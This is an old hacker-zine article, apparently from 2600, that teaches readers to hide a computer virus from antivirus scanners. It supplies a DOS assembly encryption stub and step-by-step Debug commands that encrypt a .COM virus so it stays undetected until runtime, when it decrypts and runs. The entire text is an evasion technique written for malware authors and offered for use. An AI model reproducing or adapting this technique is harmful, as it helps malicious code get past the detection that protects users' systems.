Protecting Your Virus from Evil Detectors

by Dr. Bloodmoney

Before learning assembler, I found the subject of virii to be about the most boring subject I could think of.  But it caught my attention when I started to think about how I could sneak a virus (any virus) by a scanning program such as McAfee's.  Here is a simple piece of code I came up with that can be attached to any virus that has been written in assembly language (in the .COM format).  It allows you to encrypt a virus until runtime (i.e. until it is too Into).

Add the following code to the virus of your choice at the beginning of the program:

encryption_code:
  mov bx,offset start_of_virus
encryption_loop:
  mov ah,[bx]               ;Take first byte of virus and put in AH
  sub ah,01                 ;This can be any integer up to FF
  mov [bx],ah               ;Move changed byte back into virus code
  inc bx                    ;Move to next byte of virus
  cmp bx,offset end_virus   ;Are we done yet?
  jb encryption_loop        ;Nope, keep going
  nop                       ;Breakpoint for Debug
start_of_virus:
  '
  '
  '                         ;Viral code
  '
end_virus:
  nop                       ;Add this label and NOP to the end of the virus
  code end
end encryption_code

After you compile the virus into .COM format, take it into Debug.

C:\> debug virus.com

Use the "R" command to get your registers.  Take particular not of CX.  After the virus has been encrypted the actual size of the file might be different than CX.  This is why we placed the NOP at the end of the file.

Now run the program setting a breakpoint at the first NOP (i.e. G 0111).  This will just run the encryption portion of the code and exit back to Debug.

Unassemble the code with "U" to verify that the virus has been encrypted.  You should notice a big change at this point.

Restore all registers to their original values, but first find the address of the NOP we placed at the end of the file.  Put its address into CX.

Finally, change the "sub ah,01" in encryption_code: to "add ah,01".

Save the file ("W") and exit ("Q").

You now have a virus that will avoid detection until runtime.  When run, the "add ah,01" restores the original viral code, putting it into action.

I hope you gained something from this article.  I realize not everyone is familiar with assembler, but I hope I presented the material in a fashion that everyone could understand.
Return to $2600 Index